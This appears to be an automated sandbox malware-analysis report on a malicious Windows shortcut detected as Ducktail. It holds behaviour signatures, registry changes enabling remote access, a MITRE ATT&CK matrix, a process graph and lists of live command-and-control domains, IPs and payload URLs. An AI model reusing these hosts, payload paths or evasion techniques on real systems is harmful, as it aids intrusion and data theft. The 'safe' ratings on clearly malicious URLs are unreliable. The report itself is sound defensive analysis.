      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\Temp\svczHost.exeCode function: 19_2_00007FF780A7BFE0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,19_2_00007FF780A7BFE0
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Lowering of HIPS / PFW / Operating System Security Settings

      barindex
      Modifies security policies related information
      Source: C:\Windows\Temp\myRdpService.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa DisableRestrictedAdmin
      Source: powershell.exe, 00000002.00000002.3190743931.000001B436ED1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3195651978.000001BC3819D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3189995854.000001B436E00000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3881276231.000001F1DC924000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
      Source: powershell.exe, 0000000B.00000002.3876568092.000001F1DC88F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ramFiles%\Windows Defender\MsMpeng.exe
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - Root\SecurityCenter2 : select * from AntivirusProduct
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - Root\SecurityCenter2 : select * from AntivirusProduct

      Stealing of Sensitive Information

      barindex
      Yara detected Ducktail
      Source: Yara matchFile source: Process Memory Space: svczHost.exe PID: 7664, type: MEMORYSTR

      Remote Access Functionality

      barindex
      Yara detected Ducktail
      Source: Yara matchFile source: Process Memory Space: svczHost.exe PID: 7664, type: MEMORYSTR
      Allows multiple concurrent remote connection
      Source: C:\Windows\Temp\myRdpService.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server fSingleSessionPerUser

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts321
      Windows Management Instrumentation      		1
      DLL Side-Loading      		1
      DLL Side-Loading      		1
      Disable or Modify Tools      		OS Credential Dumping1
      System Time Discovery      		1
      Remote Desktop Protocol      		1
      Archive Collected Data      		3
      Ingress Tool Transfer      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts12
      Command and Scripting Interpreter      		11
      Windows Service      		11
      Windows Service      		2
      Deobfuscate/Decode Files or Information      		LSASS Memory1
      File and Directory Discovery      		Remote Desktop ProtocolData from Removable Media11
      Encrypted Channel      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts1
      Service Execution      		Logon Script (Windows)11
      Process Injection      		1
      Obfuscated Files or Information      		Security Account Manager115
      System Information Discovery      		SMB/Windows Admin SharesData from Network Shared Drive11
      Non-Standard Port      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal Accounts5
      PowerShell      		Login HookLogin Hook1
      Software Packing      		NTDS441
      Security Software Discovery      		Distributed Component Object ModelInput Capture4
      Non-Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      DLL Side-Loading      		LSA Secrets11
      Process Discovery      		SSHKeylogging15
      Application Layer Protocol      		Scheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      File Deletion      		Cached Domain Credentials251
      Virtualization/Sandbox Evasion      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items13
      Masquerading      		DCSync1
      Application Window Discovery      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job251
      Virtualization/Sandbox Evasion      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
      Process Injection      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1551867 Sample: gW6FHWNFzR.lnk Startdate: 08/11/2024 Architecture: WINDOWS Score: 100 86 uyt1n8ded9fb380.com 2->86 90 Malicious sample detected (through community Yara rule) 2->90 92 Antivirus detection for URL or domain 2->92 94 Windows shortcut file (LNK) starts blacklisted processes 2->94 96 14 other signatures 2->96 10 cmd.exe 1 2->10         started        13 svczHost.exe 2->13         started        16 myRdpService.exe 2->16         started        19 sppsvc.exe 2->19         started        signatures3 process4 dnsIp5 120 Windows shortcut file (LNK) starts blacklisted processes 10->120 122 Suspicious powershell command line found 10->122 124 Encrypted powershell cmdline option found 10->124 136 2 other signatures 10->136 21 powershell.exe 14 49 10->21         started        26 conhost.exe 1 10->26         started        80 C:\Windows\Temp\myRdpService.exe, PE32+ 13->80 dropped 126 Multi AV Scanner detection for dropped file 13->126 28 powershell.exe 13->28         started        30 cmd.exe 13->30         started        32 cmd.exe 13->32         started        34 7 other processes 13->34 82 206.206.126.252, 49781, 8008 HYPEENT-SJUS United States 16->82 84 23.88.71.29, 49780, 49782, 8000 ENZUINC-US United States 16->84 128 Allows multiple concurrent remote connection 16->128 130 Modifies security policies related information 16->130 132 Reads the Security eventlog 16->132 134 Reads the System eventlog 16->134 file6 signatures7 process8 dnsIp9 88 uyt1n8ded9fb380.com 172.67.137.62, 443, 49751, 49752 CLOUDFLARENETUS United States 21->88 74 C:\Users\user\AppData\...\p0kqociu.cmdline, Unicode 21->74 dropped 108 Windows shortcut file (LNK) starts blacklisted processes 21->108 110 Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines) 21->110 112 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 21->112 116 3 other signatures 21->116 36 cmd.exe 1 21->36         started        39 powershell.exe 5 27 21->39         started        41 csc.exe 3 21->41         started        44 conhost.exe 21->44         started        114 Loading BitLocker PowerShell Module 28->114 46 conhost.exe 28->46         started        48 net.exe 30->48         started        50 3 other processes 30->50 52 2 other processes 32->52 54 8 other processes 34->54 file10 signatures11 process12 file13 98 Windows shortcut file (LNK) starts blacklisted processes 36->98 100 Suspicious powershell command line found 36->100 102 Encrypted powershell cmdline option found 36->102 56 powershell.exe 43 36->56         started        60 conhost.exe 36->60         started        104 Potential dropper URLs found in powershell memory 39->104 106 Loading BitLocker PowerShell Module 39->106 62 conhost.exe 39->62         started        64 WINWORD.EXE 39->64         started        78 C:\Users\user\AppData\Local\...\p0kqociu.dll, PE32 41->78 dropped 66 cvtres.exe 1 41->66         started        68 net1.exe 48->68         started        signatures14 process15 file16 76 C:\Windows\Temp\svczHost.exe, PE32+ 56->76 dropped 118 Potential dropper URLs found in powershell memory 56->118 70 conhost.exe 56->70         started        72 WmiPrvSE.exe 56->72         started        signatures17 process18

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      gW6FHWNFzR.lnk16%ReversingLabsBinary.Trojan.Generic

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Windows\Temp\svczHost.exe16%ReversingLabsWin64.Malware.Generic

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://html4/loose.dtd0%Avira URL Cloudsafe
      http://uyt1n8ded9fb380.com0%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/ij0%Avira URL Cloudsafe
      http://schemas.mi0%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/file2/941a75b2b8dd4d62918624c57bd478b5a12d02b9af905ac945932cb2af1ccd03230d09759e21f3f8c4f49ade0935501a87d56385542996b4033bd8dadba534c6f30c87289a81bd30a4920f8febc5256072687f5c2fc34696a5712231bbacfbf218a5274b2e64710df2467bce4536ee560%Avira URL Cloudsafe
      http://schemas.m0%Avira URL Cloudsafe
      http://206.206.126.252:8008/0%Avira URL Cloudsafe
      http://www.microsoft.coo40%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com0%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/d7510%Avira URL Cloudsafe
      http://.css0%Avira URL Cloudsafe
      http://schemas.openxmlfw0%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118ce0b51c3dbc308f4e5560609b6f4a95e0%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118400327ee0%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/file2/941a75b2b8dd4d62918624c57bd478b5a12d02b9af905ac945932cb2af1ccd03230%Avira URL Cloudsafe
      http://vnc.chatelement.online:80/client/ws100%Avira URL Cloudmalware
      http://schemas.microsoft.c0%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/file2/a931528c26e1c78e87bafbbfbe7cd3d2eb625e6900c36f7e4b647edf6907702d6ae2fd22a4c9df957a8baa93a3c2a28c32ca33006baf539531f41da4e7fb4444fad35468db56a2b85e5680303c8dab5f8b4923406be2a3216aa7480a3d270cd89a984610d77ede5fd7c761f22cd178c70%Avira URL Cloudsafe
      http://23.88.71.29:8000/0%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/file2/f3fcab55ab8559517835b15ceb841a5e426396ae9229b9cd92da986e6e90c4bf860a154c8fa1f9c630725c0c313abc5815d1ee096544b1025a795eed13698b4d400337bba182b28ee7aebea1ac37b2ac3671d41f9f3f21825175eec527034e65d3408693d15960269d4f4ad353c7ea530%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321180700aa170%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/file3/118b0ccf6258fcd855ea3e43f821c430215052fb3eb9eca5064994f5c1e35529838d37eb8bbc4caaba3d8623e21fcd8b056582e85c96b976f81a6cd8cefe5b84009c23e8fce5f3fc908c3b0c8f1f8b1f651fed32fb24db08cc428e6823d1046e/Windows%20Defender/16/16/user/2080%Avira URL Cloudsafe
      http://www.microsoft.c0%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/StaticFile/RdpService/120%Avira URL Cloudsafe
      http://206.206.126.252:8008/client/ws0%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118007bceee7073cc21d5383251ad61bfc70%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/file3/118b0ccf6258fcd855ea3e43f821c430215052fb3eb9eca5064994f5c1e35529830%Avira URL Cloudsafe
      http://schemas.microsoft.cl0%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/file2/30bb492ec87899a2b4a8fa5c9eeec469ac5d7939c1a666e89b2957d1443edc11d1052886fe1517bdaf10c9278dc72d04afcd88afb6e1e8bfd78687aff3d34d26ad6eb1ddfeabc5826fb14cc32d25c72b9583791a899f256f8566bc1538ad7c1f0%Avira URL Cloudsafe
      http://.jpg0%Avira URL Cloudsafe
      http://schemas.microsoft.co0%Avira URL Cloudsafe
      http://pesterbdd.com/images/Pester.png0%Avira URL Cloudsafe
      https://go.micro0%Avira URL Cloudsafe
      http://pesterbdd.com/images/Pester.pngh0%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/file0%Avira URL Cloudsafe
      http://crl.microsof90%Avira URL Cloudsafe
      http://23.88.71.29:8000/client/ws0%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de0%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321180700aa1792d8a220789936151247e2f10%Avira URL Cloudsafe
      http://www.microsoft.c10-1HtUu0%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118007bceee0%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/file2/a931528c26e1c78e87bafbbfbe7cd3d2eb625e6900c36f7e4b647edf6907702d6a0%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/file2/703e90d03436817ef0c550cdab0733b4e7b1e8dce7d6d7e6af8c26ad2c61f0372b0%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/StaticFile/TermServiceTryRun/790%Avira URL Cloudsafe
      http://uyt1n8ded9fb380.com/api/check0%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/StaticFile/RdpService/12h0%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/file2/703e90d03436817ef0c550cdab0733b4e7b1e8dce7d6d7e6af8c26ad2c61f0372b215c6f1df310b2f1c2891118dcdea15d56ca524f9e1697046cd75246b4885b7b701d1f128fa7947395230ce4dece18bbf7de42dab4380176a133a711ef9bd142ddf032fed528aee1e6eb8604c5d1960%Avira URL Cloudsafe
      http://crl.microsof0%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/0%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118ce0b51c30%Avira URL Cloudsafe
      http://schemas.openxmlforma0%Avira URL Cloudsafe
      http://uyt1n8ded9fb380.com:443/x0%Avira URL Cloudsafe
      http://uyt1n8ded9fb380.com/api/check(/0%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/file2/f3fcab55ab8559517835b15ceb841a5e426396ae9229b9cd92da986e6e90c4bf860%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118400327eefbc1ebec8d032550acafd7840%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/file2/30bb492ec87899a2b4a8fa5c9eeec469ac5d7939c1a666e89b2957d1443edc11d10%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/file2/932cebe308ef0a27dd8559a84e000b81c7997ad8503bf075cd2ba01defa0b09f670%Avira URL Cloudsafe
      http://pesterbdd.com/images/Pester.pngXz0%Avira URL Cloudsafe
      https://oneget.org0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      uyt1n8ded9fb380.com
      		172.67.137.62
      		truetrue
        		unknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        https://uyt1n8ded9fb380.com/file2/941a75b2b8dd4d62918624c57bd478b5a12d02b9af905ac945932cb2af1ccd03230d09759e21f3f8c4f49ade0935501a87d56385542996b4033bd8dadba534c6f30c87289a81bd30a4920f8febc5256072687f5c2fc34696a5712231bbacfbf218a5274b2e64710df2467bce4536ee56false
        • Avira URL Cloud: safe
        		unknown
        https://uyt1n8ded9fb380.com/ijfalse
        • Avira URL Cloud: safe
        		unknown
        https://uyt1n8ded9fb380.com/file2/f3fcab55ab8559517835b15ceb841a5e426396ae9229b9cd92da986e6e90c4bf860a154c8fa1f9c630725c0c313abc5815d1ee096544b1025a795eed13698b4d400337bba182b28ee7aebea1ac37b2ac3671d41f9f3f21825175eec527034e65d3408693d15960269d4f4ad353c7ea53false
        • Avira URL Cloud: safe
        		unknown
        https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118ce0b51c3dbc308f4e5560609b6f4a95efalse
        • Avira URL Cloud: safe
        		unknown
        https://uyt1n8ded9fb380.com/file2/a931528c26e1c78e87bafbbfbe7cd3d2eb625e6900c36f7e4b647edf6907702d6ae2fd22a4c9df957a8baa93a3c2a28c32ca33006baf539531f41da4e7fb4444fad35468db56a2b85e5680303c8dab5f8b4923406be2a3216aa7480a3d270cd89a984610d77ede5fd7c761f22cd178c7false
        • Avira URL Cloud: safe
        		unknown
        https://uyt1n8ded9fb380.com/StaticFile/RdpService/12false
        • Avira URL Cloud: safe
        		unknown
        https://uyt1n8ded9fb380.com/file3/118b0ccf6258fcd855ea3e43f821c430215052fb3eb9eca5064994f5c1e35529838d37eb8bbc4caaba3d8623e21fcd8b056582e85c96b976f81a6cd8cefe5b84009c23e8fce5f3fc908c3b0c8f1f8b1f651fed32fb24db08cc428e6823d1046e/Windows%20Defender/16/16/user/208false
        • Avira URL Cloud: safe
        		unknown
        https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118007bceee7073cc21d5383251ad61bfc7false
        • Avira URL Cloud: safe
        		unknown
        http://206.206.126.252:8008/client/wsfalse
        • Avira URL Cloud: safe
        		unknown
        https://uyt1n8ded9fb380.com/file2/30bb492ec87899a2b4a8fa5c9eeec469ac5d7939c1a666e89b2957d1443edc11d1052886fe1517bdaf10c9278dc72d04afcd88afb6e1e8bfd78687aff3d34d26ad6eb1ddfeabc5826fb14cc32d25c72b9583791a899f256f8566bc1538ad7c1ffalse
        • Avira URL Cloud: safe
        		unknown
        http://23.88.71.29:8000/client/wsfalse
        • Avira URL Cloud: safe
        		unknown
        https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321180700aa1792d8a220789936151247e2f1false
        • Avira URL Cloud: safe
        		unknown
        http://uyt1n8ded9fb380.com/api/checkfalse
        • Avira URL Cloud: safe
        		unknown
        https://uyt1n8ded9fb380.com/StaticFile/TermServiceTryRun/79false
        • Avira URL Cloud: safe
        		unknown
        https://uyt1n8ded9fb380.com/file2/703e90d03436817ef0c550cdab0733b4e7b1e8dce7d6d7e6af8c26ad2c61f0372b215c6f1df310b2f1c2891118dcdea15d56ca524f9e1697046cd75246b4885b7b701d1f128fa7947395230ce4dece18bbf7de42dab4380176a133a711ef9bd142ddf032fed528aee1e6eb8604c5d196false
        • Avira URL Cloud: safe
        		unknown
        https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118400327eefbc1ebec8d032550acafd784false
        • Avira URL Cloud: safe
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://html4/loose.dtdpowershell.exe, 0000000B.00000002.3715659309.000001F1D4DAD000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000013.00000000.3353970114.00007FF7810CA000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000013.00000002.4248447361.0000015B5FB46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 0000002C.00000002.4251536366.00007FF6E060C000.00000002.00000001.01000000.0000000A.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://uyt1n8ded9fb380.compowershell.exe, 00000002.00000002.3106887553.000001B41ECFD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3008017548.00000140005D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3383100273.000001F1C5D37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3383100273.000001F1C4885000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://schemas.mipowershell.exe, 00000007.00000002.3054390136.0000014075599000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://schemas.mpowershell.exe, 00000007.00000002.3054390136.0000014075599000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://uyt1n8ded9fb380.com/d751powershell.exe, 00000002.00000002.3106887553.000001B4200B0000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://aka.ms/nativeaot-csvczHost.exe, myRdpService.exefalse
          		high
          http://uyt1n8ded9fb380.compowershell.exe, 0000000B.00000002.3383100273.000001F1C5D37000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://contoso.com/Licensepowershell.exe, 0000002D.00000002.4198497771.000002489007C000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            http://www.microsoft.coo4powershell.exe, 0000001B.00000002.3749855601.0000021EF67A0000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://206.206.126.252:8008/myRdpService.exe, 0000002C.00000002.4247779942.000002DE26D99000.00000004.00001000.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://schemas.microsoft.cpowershell.exe, 00000007.00000002.3054390136.0000014075599000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://schemas.openxmlfwpowershell.exe, 00000007.00000002.3054390136.0000014075599000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://.csspowershell.exe, 0000000B.00000002.3715659309.000001F1D4DAD000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000013.00000000.3353970114.00007FF7810CA000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000013.00000002.4248447361.0000015B5FB46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 0000002C.00000002.4251536366.00007FF6E060C000.00000002.00000001.01000000.0000000A.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://23.88.71.29:8000/myRdpService.exe, 0000002C.00000002.4247779942.000002DE26D99000.00000004.00001000.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://uyt1n8ded9fb380.com/file2/941a75b2b8dd4d62918624c57bd478b5a12d02b9af905ac945932cb2af1ccd0323powershell.exe, 00000002.00000002.3106887553.000001B41EE30000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118400327eepowershell.exe, 00000002.00000002.3106887553.000001B41F119000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://github.com/dotnet/runtimepowershell.exe, 0000000B.00000002.3715659309.000001F1D45A7000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000013.00000000.3353970114.00007FF780FB1000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000013.00000002.4256098800.00007FF780FB1000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000013.00000002.4248447361.0000015B5F248000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 0000002C.00000002.4251536366.00007FF6E04C8000.00000002.00000001.01000000.0000000A.sdmp, myRdpService.exe, 0000002C.00000000.3904011963.00007FF6E04C8000.00000002.00000001.01000000.0000000A.sdmpfalse
              		high
              http://vnc.chatelement.online:80/client/wsmyRdpService.exe, 0000002C.00000002.4247779942.000002DE26D99000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              https://aka.ms/winsvr-2022-pshelphpowershell.exe, 0000001B.00000002.3390080505.0000021E81144000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidYpowershell.exe, 0000000B.00000002.3715659309.000001F1D4DAD000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000013.00000000.3353970114.00007FF7810CA000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000013.00000002.4248447361.0000015B5FB46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 0000002C.00000002.4251536366.00007FF6E060C000.00000002.00000001.01000000.0000000A.sdmpfalse
                  		high
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidsvczHost.exe, svczHost.exe, 00000013.00000002.4255677574.00007FF780E3F000.00000004.00000001.01000000.00000009.sdmp, myRdpService.exe, myRdpService.exe, 0000002C.00000002.4250949857.00007FF6E0306000.00000004.00000001.01000000.0000000A.sdmpfalse
                    		high
                    https://aka.ms/dotnet-warnings/powershell.exe, 0000000B.00000002.3715659309.000001F1D4DAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3715659309.000001F1D45A7000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 00000013.00000000.3353970114.00007FF7810CA000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000013.00000000.3353970114.00007FF780FB1000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000013.00000002.4256098800.00007FF780FB1000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000013.00000002.4255677574.00007FF780E3F000.00000004.00000001.01000000.00000009.sdmp, svczHost.exe, 00000013.00000002.4248447361.0000015B5F248000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000013.00000002.4248447361.0000015B5FB46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, myRdpService.exe, 0000002C.00000002.4251536366.00007FF6E060C000.00000002.00000001.01000000.0000000A.sdmp, myRdpService.exe, 0000002C.00000002.4250949857.00007FF6E0306000.00000004.00000001.01000000.0000000A.sdmp, myRdpService.exe, 0000002C.00000002.4251536366.00007FF6E04C8000.00000002.00000001.01000000.0000000A.sdmp, myRdpService.exe, 0000002C.00000000.3904011963.00007FF6E04C8000.00000002.00000001.01000000.0000000A.sdmpfalse
                      		high
                      https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321180700aa17powershell.exe, 0000000B.00000002.3383100273.000001F1C48C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3383100273.000001F1C5D37000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
